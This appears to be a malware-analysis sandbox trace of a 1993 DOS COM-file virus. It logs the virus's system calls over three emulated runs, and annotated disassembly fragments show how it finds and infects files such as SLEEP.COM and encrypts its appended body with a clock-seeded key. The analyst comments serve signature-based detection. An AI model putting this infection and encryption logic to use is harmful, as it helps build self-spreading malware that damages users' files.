2018-12-25T11:52:55.546254582Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.547577664Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.553732195Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.555644626Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.559957267Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.564995798Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.567010525Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.570468309Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.572644748Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.576783099Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.579339704Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.587871517Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.59022849Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.599632923Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.602854298Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.61112901Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.618212059Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.619661865Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.62301054Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.624451463Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.62756769Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.631685587Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.641038716Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.643228902Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.652956191Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.656613492Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.664141224Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.672115015Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.674916536Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.678185438Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.680115263Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.684301427Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.68703871Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.695929279Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.698644898Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.708093268Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.711018054Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.71974202Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.722731642Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.731827896Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.740369645Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.744049099Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:55.746402949Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:55.75292723Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:55.760618401Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:55.768419275Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:55.775151263Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:55.782715211Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:55.789654883Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:55.800964396Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:55.810109343Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:55.819030221Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:55.826889314Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:55.830574512Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Emulator listing: linear disassembly starting at the return address of the
; INT 21h "Get date" call logged on this row (op 42 = AH=2Ah). It is decoded
; straight ahead, so it shows both sides of each branch, not the executed path.
; The rows after the listing show which path ran: this run logs a "Change
; current directory" row at PC 14a01, so the weekday compare matched here.
2018-12-25T11:52:55.532086372Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3    ; AH=2Ah returns the day of week in AL (0 = Sunday), so 3 = Wednesday
0x149f5: jne 0x14a01                 ; any other weekday: skip the directory change
0x149f7: mov dx, bp                  ; bp is the base register for every data address formed here
0x149f9: add dx, 0x1fe               ; DS:DX -> path string at bp+0x1fe (its contents are not shown on this page)
0x149fd: mov ah, 0x3b                ; AH=3Bh: change current directory
0x149ff: int 0x21
0x14a01: mov ah, 0x4e                ; AH=4Eh: find first matching file
0x14a03: xor cx, cx                  ; CX=0: search attribute mask of zero
0x14a05: mov dx, bp
0x14a07: add dx, 0x201               ; DS:DX -> file spec at bp+0x201; presumably "*.COM" given the file opened in this trace - confirm
0x14a0b: int 0x21
0x14a0d: jb 0x14a31                  ; carry set = no match or error: leave the search
0x14a0f: mov ax, 0
0x14a12: mov es, ax                  ; ES = segment 0 (interrupt vector table)
0x14a14: cmp word ptr es:[3], -1     ; tests the word at 0000:0003 for 0xFFFF; purpose not visible in this listing
0x14a1a: je 0x14a29                  ; NOTE(review): 0x14a29 is not an instruction boundary in this listing (0x14a28 starts the last line)
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a  ; stores byte 0x9A into the code segment at the new bp, i.e. the code patches itself
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]       ; likely a decoding artifact: the je above lands one byte into this instruction
2018-12-25T11:52:55.536187733Z 59 PC: 14a01 | Change current directory
2018-12-25T11:52:55.540176873Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.545926272Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.558462562Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.565494886Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.566823928Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.570469384Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.572518516Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-25T11:52:55.575428112Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-25T11:52:55.578910922Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.593982389Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.595340959Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.601085316Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.602921111Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.608627642Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.622729796Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.62449516Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.627392812Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.629458251Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.632248448Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.634553471Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.643129034Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.644471458Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.65239156Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.655497149Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.66185563Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.668097776Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.670338461Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.672879317Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.674483136Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.67758188Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.682940392Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.691535264Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.69326288Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.700941742Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.703824221Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.71162277Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.718060729Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.719332808Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.722925619Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.733608158Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.736218836Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.738782523Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.752419288Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.754136684Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.760774674Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.762896107Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.766937353Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.770901351Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.772803643Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.775250096Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.776361314Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.780053549Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.782275454Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.789946779Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.791734343Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.799122832Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.801654297Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.808402987Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.814385851Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.815593785Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.818566457Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.819850276Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.822287756Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.825437463Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.833252828Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.834612626Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.843464909Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.846737857Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.852996886Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.859644713Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.860923111Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.863386769Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.865056594Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.867505833Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.869827407Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.877989947Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.879294056Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.888599753Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.891475499Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.897622443Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.904049849Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.905959727Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.913268939Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.916416484Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:55.918747649Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:55.923985989Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:55.929888629Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:55.935974972Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:55.941257883Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:55.946566008Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:55.952355372Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:55.960887945Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:55.967556294Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:55.976089778Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:55.981676462Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:55.983650042Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Emulator listing: linear disassembly starting at the return address of the
; INT 21h "Get date" call logged on this row (op 42 = AH=2Ah). It is decoded
; straight ahead, so it shows both sides of each branch, not the executed path.
; The rows after the listing show which path ran: a "Change current directory"
; row (PC 14a01) is logged only when the weekday compare matched.
2018-12-25T11:52:55.71433228Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3    ; AH=2Ah returns the day of week in AL (0 = Sunday), so 3 = Wednesday
0x149f5: jne 0x14a01                 ; any other weekday: skip the directory change
0x149f7: mov dx, bp                  ; bp is the base register for every data address formed here
0x149f9: add dx, 0x1fe               ; DS:DX -> path string at bp+0x1fe (its contents are not shown on this page)
0x149fd: mov ah, 0x3b                ; AH=3Bh: change current directory
0x149ff: int 0x21
0x14a01: mov ah, 0x4e                ; AH=4Eh: find first matching file
0x14a03: xor cx, cx                  ; CX=0: search attribute mask of zero
0x14a05: mov dx, bp
0x14a07: add dx, 0x201               ; DS:DX -> file spec at bp+0x201; presumably "*.COM" given the file opened in this trace - confirm
0x14a0b: int 0x21
0x14a0d: jb 0x14a31                  ; carry set = no match or error: leave the search
0x14a0f: mov ax, 0
0x14a12: mov es, ax                  ; ES = segment 0 (interrupt vector table)
0x14a14: cmp word ptr es:[3], -1     ; tests the word at 0000:0003 for 0xFFFF; purpose not visible in this listing
0x14a1a: je 0x14a29                  ; NOTE(review): 0x14a29 is not an instruction boundary in this listing (0x14a28 starts the last line)
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a  ; stores byte 0x9A into the code segment at the new bp, i.e. the code patches itself
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]       ; likely a decoding artifact: the je above lands one byte into this instruction
2018-12-25T11:52:55.717224874Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.722910074Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.729312637Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.73590224Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.737653408Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.740446851Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.742110821Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-25T11:52:55.744876702Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-25T11:52:55.747248803Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.761772518Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.764691196Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.773415657Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.776843859Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.787629599Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.79496422Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.796774897Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.801014054Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.802936401Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.806239045Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.810251811Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.81911269Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.820779887Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.829897514Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.833727634Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.841309096Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.84933443Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.852901288Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.856230828Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.858239928Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.862704923Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.865705244Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.874830244Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.877813235Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.886441941Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.889566027Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.897827634Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.908050809Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.910117932Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.913843978Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.916778936Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.92033639Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.923471477Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.933676031Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.935383045Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.943603859Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.947103728Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.95490644Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.962138323Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.96457882Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.967820714Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.969724146Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.973435049Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.9760042Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.985437331Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.989264528Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.001185035Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.004473861Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.012174941Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.019647557Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.02132595Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.024878061Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.027138954Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.030109909Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.034331128Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.043500192Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.045051325Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.053810242Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.057886514Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.069058544Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.076679786Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.079285144Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.082227689Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.083947271Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.08779868Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.091719248Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.110909667Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.113317102Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.122837305Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.126053351Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.134534944Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.138797599Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.140555306Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.148380898Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.152012463Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:56.15434465Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:56.160830216Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:56.168476433Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:56.174617283Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:56.189989206Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:56.196697159Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:56.204225286Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:56.214640708Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:56.222562672Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:56.232019135Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:56.250907182Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:56.254670684Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:55.692177622Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3
; Disassembly window that follows the "Get date" row above (its first
; instruction, cmp al, 3, is printed on that row). The PC logged for each
; syscall is the return address of the int 0x21, so this window starts
; right after the Get date call returns.
; DOS Get date (INT 21h/AH=2Ah) returns the day of week in AL (0 = Sunday),
; so the cmp/jne pair makes the directory change below run only when AL == 3
; (Wednesday). In this run the next logged row is "Change current directory"
; at PC 14a01, i.e. the branch was not taken.
0x149f5: jne 0x14a01                      ; AL != 3: skip the directory change
0x149f7: mov dx, bp
0x149f9: add dx, 0x1fe                    ; DX = bp + 0x1fe, path argument for AH=3Bh
                                          ; presumably bp is the code's own base offset; TODO confirm
0x149fd: mov ah, 0x3b                     ; 0x3b = 59, logged by the sandbox as "Change current directory"
0x149ff: int 0x21
0x14a01: mov ah, 0x4e                     ; 0x4e = 78, logged as "Find first file"
0x14a03: xor cx, cx                       ; attribute mask 0
0x14a05: mov dx, bp
0x14a07: add dx, 0x201                    ; DX = bp + 0x201, search filespec (3 bytes after the path above)
0x14a0b: int 0x21
0x14a0d: jb 0x14a31                       ; carry set = search failed; target lies outside this window
0x14a0f: mov ax, 0
0x14a12: mov es, ax                       ; ES = 0000h
